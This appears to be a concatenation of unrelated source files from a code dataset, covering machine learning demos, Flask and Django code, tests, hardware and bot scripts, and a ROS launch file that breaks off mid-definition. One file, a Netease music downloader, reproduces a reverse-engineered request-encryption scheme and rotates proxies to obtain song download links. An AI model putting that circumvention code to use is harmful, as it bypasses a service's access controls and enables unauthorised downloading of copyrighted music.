loss=tf.keras.losses.SparseCategoricalCrossentropy(
from_logits=True),
metrics=['accuracy'])
# Train the model
model.fit(train_images, train_labels, epochs=10)
# Evaluate accuracy
test_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)
print('\nTest accuracy:', test_acc)
# Make preditions
probability_model = tf.keras.Sequential([model,
tf.keras.layers.Softmax()])
predictions = probability_model.predict(test_images)
#############################################################################
#############################################################################
def plot_image(i, predictions_array, true_label, img):
true_label, img = true_label[i], img[i]
plt.grid(False)
plt.xticks([])
plt.yticks([])
plt.imshow(img, cmap=plt.cm.binary)
predicted_label = np.argmax(predictions_array)
if predicted_label == true_label:
color = 'blue'
else:
color = 'red'
plt.xlabel("{} {:2.0f}% ({})".format(class_names[predicted_label],
100*np.max(predictions_array),
class_names[true_label]),
color=color)
def plot_value_array(i, predictions_array, true_label):
true_label = true_label[i]
plt.grid(False)
plt.xticks(range(10))
plt.yticks([])
thisplot = plt.bar(range(10), predictions_array, color="#777777")
plt.ylim([0, 1])
predicted_label = np.argmax(predictions_array)
thisplot[predicted_label].set_color('red')
thisplot[true_label].set_color('blue')
# print(test_images[0:5])
# print(test_labels[0:5])
# print("------------")
myImg = Image.open("./3a.png")
np1Img = np.array(myImg) / 255
npMyImg = np.array([np1Img])
# print(npMyImg)
# print(np.array([0]))
# print(npMyImg)
# test_loss, test_acc = model.evaluate(
# npMyImg, np.array([0]), verbose=2)
# Make preditions
probability_model = tf.keras.Sequential([model,
tf.keras.layers.Softmax()])
test_my_image = probability_model.predict(npMyImg)
print(test_my_image)
print(np.argmax(test_my_image))
print(class_names[np.argmax(test_my_image)])
def plot_x_images():
num_rows = 5
num_cols = 3
num_images = num_rows*num_cols
plt.figure(figsize=(2*2*num_cols, 2*num_rows))
for i in range(num_images):
plt.subplot(num_rows, 2*num_cols, 2*i+1)
plot_image(9000 + i, predictions[i], test_labels, test_images)
plt.subplot(num_rows, 2*num_cols, 2*i+2)
plot_value_array(9000 + i, predictions[i], test_labels)
plt.tight_layout()
plt.savefig("plottedImages9000.png")
# plot_x_images()
| StarcoderdataPython |
6605343 | import pytest
import socket
from app import *
@pytest.fixture
def client():
client = app.test_client()
return client
def test_root(client):
"""Test the default route."""
res = client.get('/hello/Juan')
assert 'Juan' in str(res.data) and str(socket.gethostname()) in str(res.data)
| StarcoderdataPython |
1996927 | from typing import Any
from checkov.common.models.enums import CheckCategories, CheckResult
from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
class RejectUnsignedCommits(BaseResourceValueCheck):
def __init__(self) -> None:
name = "Ensure commits are signed"
id = "CKV_GLB_4"
supported_resources = ["gitlab_project"]
categories = [CheckCategories.GENERAL_SECURITY]
super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,
missing_block_result=CheckResult.FAILED)
def get_inspected_key(self) -> str:
return "push_rules/[0]/reject_unsigned_commits"
def get_expected_value(self) -> Any:
return True
check = RejectUnsignedCommits()
| StarcoderdataPython |
6619067 | <reponame>TauOmicronMu/Y13Computing<gh_stars>0
# -*- coding: utf-8 -*-
#DeductExpenditureScreenStringsGerman
DEDUCT_EXPENDITURE_HELP_TEXT = u"Hier können Sie die Ausgaben bei den Gesamtausgaben abziehen."
ENTER_ADMIN_PASS_TEXT = u"Administrator-Kennwort: "
EXPENDITURE_ONE_TEXT = u"Geben Sie Ausgaben abziehen: "
EXPENDITURE_TWO_TEXT = u"Geben Sie Ausgaben: "
SUBMIT_BUTTON_TEXT = u"Senden"
| StarcoderdataPython |
1893887 | from flask import Flask
from flask_cors import CORS
def create_app():
try:
app = Flask(__name__, instance_relative_config=True)
CORS(app)
from .common.mqtt_client import init_mqtt
init_mqtt()
@app.route("/")
def home():
return "<h1>Welcome to flask mqtt integration service<h1>"
return app
except Exception as e:
raise e
| StarcoderdataPython |
1630020 | <gh_stars>0
from django.contrib import admin
from django.core import exceptions
from django.forms import BaseInlineFormSet
from django.forms.models import ModelForm
from django.utils.translation import gettext_lazy as _
from ordered_model.admin import (
OrderedInlineModelAdminMixin,
OrderedModelAdmin,
OrderedStackedInline,
)
from sponsors.models import SponsorLevel
from .models import (
AudienceLevel,
Conference,
Deadline,
Duration,
Keynote,
KeynoteSpeaker,
Topic,
)
def validate_deadlines_form(forms):
existing_types = set()
for form in forms:
if not form.cleaned_data:
return
start = form.cleaned_data["start"]
end = form.cleaned_data["end"]
delete = form.cleaned_data["DELETE"]
if start > end:
raise exceptions.ValidationError(_("Start date cannot be after end"))
type = form.cleaned_data["type"]
if type == Deadline.TYPES.custom or delete:
continue
if type in existing_types:
raise exceptions.ValidationError(
_("You can only have one deadline of type %(type)s") % {"type": type}
)
existing_types.add(type)
class DeadlineForm(ModelForm):
class Meta:
model = Deadline
fields = ["start", "end", "name", "description", "type", "conference"]
class DeadlineFormSet(BaseInlineFormSet):
def clean(self):
validate_deadlines_form(self.forms)
class DeadlineInline(admin.TabularInline):
model = Deadline
form = DeadlineForm
formset = DeadlineFormSet
class DurationInline(admin.StackedInline):
model = Duration
filter_horizontal = ("allowed_submission_types",)
class SponsorLevelInline(admin.TabularInline):
model = SponsorLevel
@admin.register(Conference)
class ConferenceAdmin(admin.ModelAdmin):
readonly_fields = ("created", "modified")
filter_horizontal = ("topics", "languages", "audience_levels", "submission_types")
fieldsets = (
(
"Details",
{
"fields": (
"name",
"code",
"introduction",
"timezone",
"latitude",
"longitude",
"map_link",
)
},
),
(
"Pretix",
{"fields": ("pretix_organizer_id", "pretix_event_id", "pretix_event_url")},
),
(
"Hotel",
{
"fields": (
"pretix_hotel_ticket_id",
"pretix_hotel_room_type_question_id",
"pretix_hotel_checkin_question_id",
"pretix_hotel_checkout_question_id",
)
},
),
(
"Conference",
{
"fields": (
("start", "end"),
"submission_types",
"topics",
"audience_levels",
"languages",
)
},
),
)
inlines = [DeadlineInline, DurationInline, SponsorLevelInline]
@admin.register(Topic)
class TopicAdmin(admin.ModelAdmin):
pass
@admin.register(AudienceLevel)
class AudienceLevelAdmin(admin.ModelAdmin):
pass
@admin.register(Deadline)
class DeadlineAdmin(admin.ModelAdmin):
fieldsets = (
("Info", {"fields": ("name", "description", "type", "conference")}),
("Dates", {"fields": ("start", "end")}),
)
class KeynoteSpeakerInline(OrderedStackedInline):
model = KeynoteSpeaker
extra = 1
fields = (
"keynote",
"name",
"photo",
"bio",
"pronouns",
"highlight_color",
"twitter_handle",
"instagram_handle",
"website",
"order",
"move_up_down_links",
)
readonly_fields = (
"order",
"move_up_down_links",
)
extra = 1
ordering = ("order",)
@admin.register(Keynote)
class KeynoteAdmin(OrderedInlineModelAdminMixin, OrderedModelAdmin):
list_display = (
"title",
"conference",
"move_up_down_links",
)
list_filter = ("conference",)
fieldsets = (
(
_("Keynote"),
{
"fields": (
"conference",
"slug",
"title",
"description",
"topic",
)
},
),
)
inlines = [
KeynoteSpeakerInline,
]
| StarcoderdataPython |
1974724 | import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from KNN_Class import K_NN
# import the iris dataset
df = pd.read_csv("iris.csv", header=None)
# identify our features and target
x = np.array(df.drop(columns=[4]))
y = np.array(df[4])
# create a train and test dataset
X_train, X_test, y_train, y_test = train_test_split(x, y, test_size=0.33, random_state=42)
# instatiate our class object with k=3
model = K_NN(K=3)
# fit our data onto the model
model.fit(X_train, y_train)
# create our prediction
y_pred = model.predict(X_test)
# print out the result of our prediction
print(f"By hand accuracy: {accuracy_score(y_test, y_pred)}")
# Using the sklearn KNN class
from sklearn.neighbors import KNeighborsClassifier
# instantiate the sklearn KNN class
neigh = KNeighborsClassifier(n_neighbors=3)
# fit the data onto the model
neigh.fit(X_train, y_train)
# create the prediction
sklearn_pred = neigh.predict(X_test)
# print out the accuracy of the predictions compared to the actual labels
print(f"Sklearn model accuracy: {accuracy_score(y_test, sklearn_pred)}") | StarcoderdataPython |
21513 | <gh_stars>0
name = " alberT"
one = name.rsplit()
print("one:", one)
two = name.index('al', 0)
print("two:", two)
three = name.index('T', -1)
print("three:", three)
four = name.replace('l', 'p')
print("four:", four)
five = name.split('l')
print("five:", five)
six = name.upper()
print("six:", six)
seven = name.lower()
print("seven:", seven)
eight = name[1]
print("eight:", eight )
nine = name[:3]
print("nine:", nine)
ten = name[-2:]
print("ten:", ten)
eleven = name.index("e")
print("eleven:", eleven)
twelve = name[:-1]
print("twelve:", twelve) | StarcoderdataPython |
1807453 | <gh_stars>1000+
from torchvision import transforms
from ts.torch_handler.image_classifier import ImageClassifier
class MNISTDigitClassifier(ImageClassifier):
"""
MNISTDigitClassifier handler class. This handler extends class ImageClassifier from image_classifier.py, a
default handler. This handler takes an image and returns the number in that image.
Here method postprocess() has been overridden while others are reused from parent class.
"""
image_processing = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
def postprocess(self, data):
return data.argmax(1).tolist()
| StarcoderdataPython |
12857197 | #!/usr/bin/python
import sys, getopt, os, time, array
from pyftdi.spi import SpiController
def download ( filename, speed=5000000, chunksize=32 ):
try:
with open(filename, 'rb') as filein:
data = filein.read ()
data = array.array('B', data).tolist()
except IOError:
print "ERROR: Could not open file {0}".format(os.path.basename(filename))
exit (1)
try:
spi = SpiController(silent_clock=True)
spi.configure(vendor=0x0403, product=0x6010, interface=2)
spi2mars = spi.get_port(cs=0)
spi2mars.set_frequency(speed)
time.sleep(1)
startTime = time.time()
i = 0
length = len(data)
while length > chunksize:
spi2mars.exchange(data[i:i+chunksize])
i += chunksize
length -= chunksize
spi2mars.exchange(data[i:])
stopTime = time.time()
print "File {0} dumped on SPI @{1}MHz ({2}bytes in {3} seconds)".format(os.path.basename(filename), speed/1.0e6, len(data), stopTime - startTime)
return (len(data), stopTime-startTime)
except Exception, e :
print "ERROR: SPI Write -", e
exit (1)
def main (argv):
print "SAF5100 SPI downloader"
try:
opts, args = getopt.getopt(argv, "hf:",["--firmware="])
except:
print "spi_host_write.py -f <firmware>"
sys.exit(2)
fname="/lib/firmware/cohda/SDRMK5Dual.bin".format(os.path.dirname(sys.argv[0]))
for opt, arg in opts:
if opt=="-h":
print "spi_host_write.py -f <firmware>"
elif opt=="-f":
fname = arg
print "Downloading {0}".format(fname)
download (fname)
if __name__ == "__main__":
main (sys.argv[1:])
| StarcoderdataPython |
8140838 | <filename>zhuaxia/netease.py
# -*- coding:utf-8 -*-
import time
import re
import requests
import log, config, util
import json
import md5
import os
from os import path
import downloader
from obj import Song, Handler
if config.LANG.upper() == 'CN':
import i18n.msg_cn as msg
else:
import i18n.msg_en as msg
LOG = log.get_logger("zxLogger")
#163 music api url
url_163="http://music.163.com"
#url_mp3="http://m1.music.126.net/%s/%s.mp3" #not valid any longer
url_album="http://music.163.com/api/album/%s/"
url_song="http://music.163.com/api/song/detail/?id=%s&ids=[%s]"
url_playlist="http://music.163.com/api/playlist/detail?id=%s"
url_artist_top_song = "http://music.163.com/api/artist/%s"
url_lyric = "http://music.163.com/api/song/lyric?id=%s&lv=1"
url_mp3_post = 'http://music.163.com/weapi/song/enhance/player/url?csrf_token='
#agent string for http request header
AGENT= 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36'
#this block is kind of magical secret.....No idea why the keys, modulus have those values ( for building the post request parameters. The encryption logic was take from https://github.com/Catofes/musicbox/blob/new_api/NEMbox/api.py)
modulus = '00e0b509f6259df8642dbc35662901477df22677ec152b5ff68ace615bb7b725152b3ab17a876aea8a5aa76d2e417629ec4ee341f56135fccf695280104e0312ecbda92557c93870114af6c9d05c4f7f0c3685b7a46bee255932575cce10b424d813cfe4875d3e82047b97ddef52741d546b8e289dc6935b3ece0462db0a22b8e7'
nonce = '0CoJUm6Qyw8W8jud'
pubKey = '010001'
class NeteaseSong(Song):
"""
163 Song class, if song_json was given,
Song.post_set() needs to be called for post-setting
abs_path, filename, etc.
url example: http://music.163.com/song?id=209235
"""
def __init__(self,m163,url=None, song_json=None):
Song.__init__(self)
self.song_type=2
self.handler = m163
# self.group_dir = None
# self.lyric_text = ''
if url:
self.url = url
self.song_id = re.search(r'(?<=/song\?id=)\d+', url).group(0)
LOG.debug(msg.head_163 + msg.fmt_init_song % self.song_id)
response = self.handler.read_link(url_song % (self.song_id,self.song_id))
#print json for debug
#LOG.debug(util.format_json(response.text))
j = response.json()['songs'][0]
self.init_by_json(j)
LOG.debug(msg.head_163 + msg.fmt_init_song_ok % self.song_id)
#set filename, abs_path etc.
self.post_set()
elif song_json:
self.init_by_json(song_json)
def init_by_json(self,js):
#song_id
self.song_id = js['id']
#name
self.song_name = util.decode_html(js['name'])
LOG.debug("parsing song %s ...."%self.song_name)
# artist_name
self.artist_name = js['artists'][0]['name']
# album id, name
self.album_name = util.decode_html(js['album']['name'])
self.album_id = js['album']['id']
#track no
if 'position' in js and js['position']:
self.track_no = js['position']
elif 'no' in js and js['no']:
self.track_no = js['no']
# download link
dfsId = ''
bitrate = 0
if self.handler.is_hq and js['hMusic']:
dfsId = js['hMusic']['dfsId']
quality = 'HD'
bitrate = js['hMusic']['bitrate']
elif js['mMusic']:
dfsId = js['mMusic']['dfsId']
quality = 'MD'
bitrate = js['mMusic']['bitrate']
elif js['lMusic']:
LOG.warning(msg.head_163 + msg.fmt_quality_fallback %self.song_name)
dfsId = js['lMusic']['dfsId']
quality = 'LD'
bitrate = js['lMusic']['bitrate']
if dfsId:
# self.dl_link = url_mp3 % (self.handler.encrypt_dfsId(dfsId), dfsId)
self.dl_link = self.handler.get_mp3_dl_link(self.song_id, bitrate)
else:
LOG.warning(msg.head_163 + msg.fmt_err_song_parse %self.song_name)
#used only for album/collection etc. create a dir to group all songs
#if it is needed, it should be set by the caller
self.group_dir = None
class NeteaseAlbum(object):
"""The netease album object"""
def __init__(self, m163, url):
"""url example: http://music.163.com/album?id=2646379"""
self.handler=m163
self.url = url
self.album_id = re.search(r'(?<=/album\?id=)\d+', self.url).group(0)
LOG.debug(msg.head_163 + msg.fmt_init_album % self.album_id)
self.year = None
self.track=None
self.songs = [] # list of Song
self.init_album()
def init_album(self):
#album json
js = self.handler.read_link(url_album % self.album_id).json()['album']
#name
self.album_name = util.decode_html(js['name'])
#album logo
self.logo = js['picUrl']
# artist_name
self.artist_name = js['artists'][0]['name']
#handle songs
for jsong in js['songs']:
song = NeteaseSong(self.handler, song_json=jsong)
song.group_dir = self.artist_name + u'_' + self.album_name
song.post_set()
self.songs.append(song)
d = path.dirname(self.songs[-1].abs_path)
#creating the dir
LOG.debug(msg.head_163 + msg.fmt_create_album_dir % d)
util.create_dir(d)
#download album logo images
LOG.debug(msg.head_163 + msg.fmt_dl_album_cover % self.album_name)
downloader.download_url(self.logo, path.join(d,'cover.' +self.logo.split('.')[-1]))
class NeteasePlayList(object):
"""The netease playlist object"""
def __init__(self, m163, url):
self.url = url
self.handler = m163
#user id in url
self.playlist_id = re.search(r'(?<=/playlist\?id=)\d+', self.url).group(0)
self.songs = []
self.init_playlist()
def init_playlist(self):
j = self.handler.read_link(url_playlist % (self.playlist_id) ).json()['result']
self.playlist_name = j['name']
for jsong in j['tracks']:
song = NeteaseSong(self.handler, song_json=jsong)
#rewrite filename, make it different
song.group_dir = self.playlist_name
song.post_set()
self.songs.append(song)
if len(self.songs):
#creating the dir
util.create_dir(path.dirname(self.songs[-1].abs_path))
class NeteaseTopSong(object):
"""download top songs of given artist"""
def __init__(self, m163, url):
self.url = url
self.handler = m163
#artist id
self.artist_id = re.search(r'(?<=/artist\?id=)\d+', self.url).group(0)
self.artist_name = ""
self.songs = []
self.init_topsong()
def init_topsong(self):
j = self.handler.read_link(url_artist_top_song % (self.artist_id)).json()
self.artist_name = j['artist']['name']
for jsong in j['hotSongs']:
song = NeteaseSong(self.handler, song_json=jsong)
song.group_dir = self.artist_name + '_TopSongs'
song.post_set()
self.songs.append(song)
#check config for top X
if config.DOWNLOAD_TOP_SONG>0 and len(self.songs) >= config.DOWNLOAD_TOP_SONG:
break
if len(self.songs):
#creating the dir
util.create_dir(path.dirname(self.songs[-1].abs_path))
class Netease(Handler):
"""
netease object
option is the user given options and other data @see __init__
"""
def __init__(self, option):
Handler.__init__(self,option.proxy_pool)
self.is_hq = option.is_hq
self.dl_lyric = option.dl_lyric
self.proxy = option.proxy
#headers
self.HEADERS = {'User-Agent':AGENT}
self.HEADERS['Referer'] = url_163
self.HEADERS['Cookie'] = 'appver=1.7.3'
def read_link(self, link):
retVal = None
requests_proxy = {}
if self.proxy:
requests_proxy = { 'http':self.proxy}
if self.need_proxy_pool:
requests_proxy = {'http':self.proxy_pool.get_proxy()}
while True:
try:
retVal = requests.get(link, headers=self.HEADERS, proxies=requests_proxy)
break
except requests.exceptions.ConnectionError:
LOG.debug('invalid proxy detected, removing from pool')
self.proxies.del_proxy(requests_proxy['http'])
if self.proxies:
requests_proxy['http'] = self.proxies.get_proxy()
else:
LOG.debug('proxy pool is empty')
raise
break
else:
retVal = requests.get(link, headers=self.HEADERS, proxies=requests_proxy)
return retVal
def encrypt_dfsId(self,dfsId):
byte1 = bytearray('3go8&$8*3*3h0k(2)2')
byte2 = bytearray(str(dfsId))
byte1_len = len(byte1)
for i in xrange(len(byte2)):
byte2[i] = byte2[i]^byte1[i%byte1_len]
m = md5.new()
m.update(byte2)
result = m.digest().encode('base64')[:-1]
result = result.replace('/', '_')
result = result.replace('+', '-')
return result
def createSecretKey(self, size):
return (''.join(map(lambda xx: (hex(ord(xx))[2:]), os.urandom(size))))[0:16]
def encrypt_post_param(self,req_dict):
text = json.dumps(req_dict)
secKey = self.createSecretKey(16)
encText = util.aes_encrypt(util.aes_encrypt(text, nonce), secKey)
encSecKey = util.rsa_encrypt(secKey, pubKey, modulus)
result = {
'params': encText,
'encSecKey': encSecKey
}
return result
def get_mp3_dl_link(self, song_id, bitrate):
req = {
"ids": [song_id],
"br": bitrate,
"csrf_token": ""
}
page = requests.post(url_mp3_post, data=self.encrypt_post_param(req), headers=self.HEADERS, timeout=30, proxies={'http':self.proxy})
result = page.json()["data"][0]["url"]
return result
| StarcoderdataPython |
9791906 | # -*- coding: utf-8 -*-
"""
Tertiary example - Plotting sin3
===================================
This is a general example demonstrating a Matplotlib plot output, embedded
rST, the use of math notation and cross-linking to other examples. It would be
useful to compare with the
output below.
.. math::
x \\rightarrow \\sin(x)
Here the function :math:`\\sin` is evaluated at each point the variable
:math:`x` is defined.
"""
import numpy as np
import matplotlib.pyplot as plt
x = np.linspace(0, 2 * np.pi, 100)
y = np.sin(x)
plt.plot(x, y)
plt.xlabel('$x$')
plt.ylabel('$\sin(x)$')
# To avoid matplotlib text output
plt.show()
#%%
# To include embedded rST, use a line of >= 20 ``#``'s or ``#%%`` between your
# rST and your. This separates your example
# into distinct text and code blocks. You can continue writing code below the
# embedded rST text block:
print('This example shows a sin plot!')
#%%
from py_qs_example.mymodule import ExampleClass, example_function, less_important_function
ec = ExampleClass(5)
ec
#%%
output = example_function(ec, '_test')
output
#%%
# LaTeX syntax in the text blocks does not require backslashes to be escaped:
#
# .. math::
# \sin
#
# Cross referencing
# ^^^^^^^^^^^^^^^^^
#
# You can refer to an example from any part of the documentation,
# including from other examples. Sphinx-Gallery automatically creates reference
# labels for each example. The label consists of the ``.py`` file name,
# prefixed with ``sphx_glr_`` and the name of the
# folder(s) the example is in. In this case, the example we want to
# cross-reference is in ``auto_examples`` (the ``gallery_dirs``; see | StarcoderdataPython |
3581668 | import requests
from datetime import date, timedelta
"""
script to get the current exchange rate for currencies
via API from FIXER.IO
and send it via TELEGRAM to the user
this scripts runs once a day on PYTHONANYWHERE.COM
"""
#to FIXER.io
_ACCESS_KEY = 'YOUR_FIXER_IO_KEY'
#Telegram keys
_BOT_TOKEN = '<PASSWORD>'
_BOT_Chat_ID = 'CHAT_ID_ADRESSEE'
def telegram_bot_sendmessage(bot_token: str, bot_chatID: str, bot_message: str):
"""send message to telegram"""
api_text = (
f'https://api.telegram.org/bot{bot_token}'
f'/sendMessage?chat_id={bot_chatID}'
f'&parse_mode=Markdown&text={bot_message}'
)
r = requests.get(api_text)
return r.json()
def get_current_exchange_rate():
"""latest information of exchange rate"""
web_api = (
f'http://data.fixer.io/api/latest'
f'? access_key={_ACCESS_KEY}'
f'& format=1'
f'& base=EUR'
f'& symbols=GBP'
)
r = requests.get(web_api)
return r.json()['rates']['GBP']
def get_weekly_high():
"""weekly high"""
for i in range(1,8):
hist_date = date.today() - timedelta(days=i)
web_api = (
f'http://data.fixer.io/api/{hist_date}'
f'? access_key={ACCESS_KEY}'
f'& base=EUR'
f'& symbols=GBP'
)
r = requests.get(web_api)
#weekly_high = r.json()['rates']['GBP'] if r.json()['rates']['GBP'] < weekly_high else weekly_high
if i == 1 or r.json()['rates']['GBP'] < weekly_high:
weekly_high = r.json()['rates']['GBP']
return weekly_high
if __name__ == '__main__':
#GBP in Euro
message = (
f'current exchange rate:\n 1 Pound = {1/get_current_exchange_rate():.3} Euro \n'
f'best exchange rate last 7 days:\n 1 Pound = {1/get_weekly_high():.3} Euro'
)
#print(message)
response = telegram_bot_sendmessage(_BOT_TOKEN, _BOT_Chat_ID, message)
#print(response) | StarcoderdataPython |
383729 | from spaceone.inventory.connector.aws_elasticache_connector.connector import ElastiCacheConnector
| StarcoderdataPython |
5049518 | import pymel.core as pm
import AETemplates as aetml
def unload_mtm_plugin():
pm.newFile(force=True)
if pm.pluginInfo("mayatomantra.mll", query=True, loaded=True):
pm.unloadPlugin("mayatomantra.mll")
pm.newFile(force=True)
def load_mtm_plugin():
if not pm.pluginInfo("mayatomantra.mll", query=True, loaded=True):
pm.loadPlugin("mayatomantra.mll")
def testPlugin():
print aetml.AEdagNodeInclude.nodeType()
print "Executing test" | StarcoderdataPython |
8191741 | # Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests for summary.py module.
"""
from __future__ import absolute_import, division, print_function
import os
import pandas as pd
import pytest
from causalimpact.summary import Summary
@pytest.fixture
def summary_data():
data = [
[5.123, 10.456],
[4.234, 9.567],
[3.123, 8.456],
[6.234, 9.567],
[3.123, 10.456],
[2.234, 4.567],
[6.123, 9.456],
[0.2345, 0.5678],
[0.1234, 0.4567],
[0.2345, 0.5678]
]
data = pd.DataFrame(
data,
columns=['average', 'cumulative'],
index=[
'actual',
'predicted',
'predicted_lower',
'predicted_upper',
'abs_effect',
'abs_effect_lower',
'abs_effect_upper',
'rel_effect',
'rel_effect_lower',
'rel_effect_upper'
]
)
return data
@pytest.fixture
def summarizer():
return Summary()
def test_summary_raises(summarizer):
summarizer = Summary()
with pytest.raises(RuntimeError):
summarizer.summary()
with pytest.raises(ValueError):
summarizer.summary_data = 'test'
summarizer.summary('test')
def test_output_summary_single_digit(summary_data, fix_path, summarizer):
summarizer.summary_data = summary_data
summarizer.alpha = 0.1
summarizer.p_value = 0.459329
result = summarizer.summary(digits=1)
expected = open(os.path.join(
fix_path, 'test_output_summary_single_digit')).read().strip()
assert result == expected
def test_report_summary_single_digit(summary_data, fix_path, summarizer):
# detected positive signal but with no significance.
summarizer.summary_data = summary_data
summarizer.alpha = 0.1
summarizer.p_value = 0.5
summary_data['average']['rel_effect'] = 0.41
summary_data['average']['rel_effect_lower'] = -0.30
summary_data['average']['rel_effect_upper'] = 0.30
result = summarizer.summary(output='report', digits=1)
expected = open(os.path.join(
fix_path, 'test_report_summary_single_digit')).read().strip()
assert result == expected
def test_output_summary_1(summary_data, fix_path, summarizer):
summarizer.summary_data = summary_data
summarizer.alpha = 0.1
summarizer.p_value = 0.459329
result = summarizer.summary()
expected = open(os.path.join(fix_path, 'test_output_summary_1')).read().strip()
assert result == expected
def test_report_summary_1(summary_data, fix_path, summarizer):
# detected positive signal but with no significance.
summarizer.summary_data = summary_data
summarizer.alpha = 0.1
summarizer.p_value = 0.5
summary_data['average']['rel_effect'] = 0.41
summary_data['average']['rel_effect_lower'] = -0.30
summary_data['average']['rel_effect_upper'] = 0.30
result = summarizer.summary(output='report')
expected = open(os.path.join(fix_path, 'test_report_summary_1')).read().strip()
assert result == expected
def test_report_summary_2(summary_data, fix_path, summarizer):
# detected positive signal with significance.
summarizer.summary_data = summary_data
summarizer.alpha = 0.1
summarizer.p_value = 0.05
summary_data['average']['rel_effect'] = 0.41
summary_data['average']['rel_effect_lower'] = 0.434
summary_data['average']['rel_effect_upper'] = 0.234
result = summarizer.summary(output='report')
expected = open(os.path.join(fix_path, 'test_report_summary_2')).read().strip()
assert result == expected
def test_report_summary_3(summary_data, fix_path, summarizer):
# detected negative signal but with no significance.
summary_data['average']['rel_effect'] = -0.343
summary_data['average']['rel_effect_lower'] = -0.434
summary_data['average']['rel_effect_upper'] = 0.234
summarizer.summary_data = summary_data
summarizer.alpha = 0.1
summarizer.p_value = 0.5
result = summarizer.summary(output='report')
expected = open(os.path.join(fix_path, 'test_report_summary_3')).read().strip()
assert result == expected
def test_report_summary_4(summary_data, fix_path, summarizer):
# detected negative signal with significance.
summary_data['average']['rel_effect'] = -0.343
summary_data['average']['rel_effect_lower'] = -0.434
summary_data['average']['rel_effect_upper'] = -0.234
summarizer.summary_data = summary_data
summarizer.alpha = 0.1
summarizer.p_value = 0.05
result = summarizer.summary(output='report')
expected = open(os.path.join(fix_path, 'test_report_summary_4')).read().strip()
assert result == expected
| StarcoderdataPython |
3248887 | <reponame>IL2HorusTeam/il2fb-ds-events-parser
import datetime
import re
from typing import Optional
from il2fb.commons.actors import HumanAircraftActor
from il2fb.commons.spatial import Point3D
from il2fb.ds.events.definitions.takeoff import HumanAircraftTookOffEvent
from il2fb.ds.events.definitions.takeoff import HumanAircraftTookOffInfo
from .base import LineWithTimestampParser
from .text import strip_spaces
from .regex import HUMAN_AIRCRAFT_REGEX
from .regex import POS_REGEX
from ._utils import export
HUMAN_AIRCRAFT_TOOK_OFF_REGEX = re.compile(
rf"^{HUMAN_AIRCRAFT_REGEX} in flight at {POS_REGEX}$"
)
@export
class HumanAircraftTookOffLineParser(LineWithTimestampParser):
"""
Parses gamelog messages about take-off events.
Examples of input lines:
"TheUser:TB-7_M40F in flight at 145663.6 62799.64"
"TheUser:TB-7_M40F in flight at 145663.6 62799.64 83.96088"
" The User :TB-7_M40F in flight at 145663.6 62799.64 83.96088"
" :TB-7_M40F in flight at 145663.6 62799.64 83.96088"
":TB-7_M40F in flight at 145663.6 62799.64 83.96088"
"""
def parse_line(self, timestamp: datetime.datetime, line: str) -> Optional[HumanAircraftTookOffEvent]:
match = HUMAN_AIRCRAFT_TOOK_OFF_REGEX.match(line)
if not match:
return
callsign = strip_spaces(match.group('callsign'))
actor = HumanAircraftActor(
callsign=callsign,
aircraft=match.group('aircraft'),
)
pos = Point3D(
x=float(match.group('x')),
y=float(match.group('y')),
z=float(match.group('z') or 0),
)
return HumanAircraftTookOffEvent(HumanAircraftTookOffInfo(
timestamp=timestamp,
actor=actor,
pos=pos,
))
| StarcoderdataPython |
8029785 | <filename>server/athenian/api/models/web/organization.py<gh_stars>1-10
from typing import Optional
from athenian.api.models.web.base_model_ import Model
class Organization(Model):
"""GitHub organization details."""
openapi_types = {
"name": str,
"avatar_url": str,
"login": str,
}
attribute_map = {
"name": "name",
"avatar_url": "avatar_url",
"login": "login",
}
def __init__(self,
name: Optional[str] = None,
avatar_url: Optional[str] = None,
login: Optional[str] = None):
"""Organization - a model defined in OpenAPI
:param name: The name of this Organization.
:param avatar_url: The avatar_url of this Organization.
:param login: The login of this Organization.
"""
self._name = name
self._avatar_url = avatar_url
self._login = login
@property
def name(self) -> str:
"""Gets the name of this Organization.
:return: The name of this Organization.
"""
return self._name
@name.setter
def name(self, name: str):
"""Sets the name of this Organization.
:param name: The name of this Organization.
"""
if name is None:
raise ValueError("Invalid value for `name`, must not be `None`")
self._name = name
@property
def avatar_url(self) -> str:
"""Gets the avatar_url of this Organization.
:return: The avatar_url of this Organization.
"""
return self._avatar_url
@avatar_url.setter
def avatar_url(self, avatar_url: str):
"""Sets the avatar_url of this Organization.
:param avatar_url: The avatar_url of this Organization.
"""
if avatar_url is None:
raise ValueError("Invalid value for `avatar_url`, must not be `None`")
self._avatar_url = avatar_url
@property
def login(self) -> str:
"""Gets the login of this Organization.
:return: The login of this Organization.
"""
return self._login
@login.setter
def login(self, login: str):
"""Sets the login of this Organization.
:param login: The login of this Organization.
"""
if login is None:
raise ValueError("Invalid value for `login`, must not be `None`")
self._login = login
| StarcoderdataPython |
8165105 | # Good morning! Here's your coding interview problem for today.
# This problem was asked by Jane Street.
# cons(a, b) constructs a pair, and car(pair) and cdr(pair) returns the first and last element of that pair.
# For example, car(cons(3, 4)) returns 3, and cdr(cons(3, 4)) returns 4.
# Given this implementation of cons:
def cons(a, b):
def pair(f):
return f(a, b)
return pair
# Implement car and cdr.
def car(f):
def left(a,b):
return a
return f(left)
def cdr(f):
def right(a,b):
return b
return f(right)
print( car(cons(3, 4)))
print (cdr(cons(3, 4))) | StarcoderdataPython |
3364597 | <filename>hello_world_cpp/launch/talker_listener_singleprocess.launch.py
import launch
from launch_ros.actions import ComposableNodeContainer
from launch_ros.descriptions import ComposableNode
def generate_launch_description():
container = ComposableNodeContainer(
node_name = 'my_container',
node_namespace = '',
package = 'rclcpp_components',
node_executable = 'component_container',
composable_node_descriptions = [
ComposableNode(
package = 'hello_world_cpp',
node_plugin = 'hello_world_cpp::Talker',
node_name = 'talker'
),
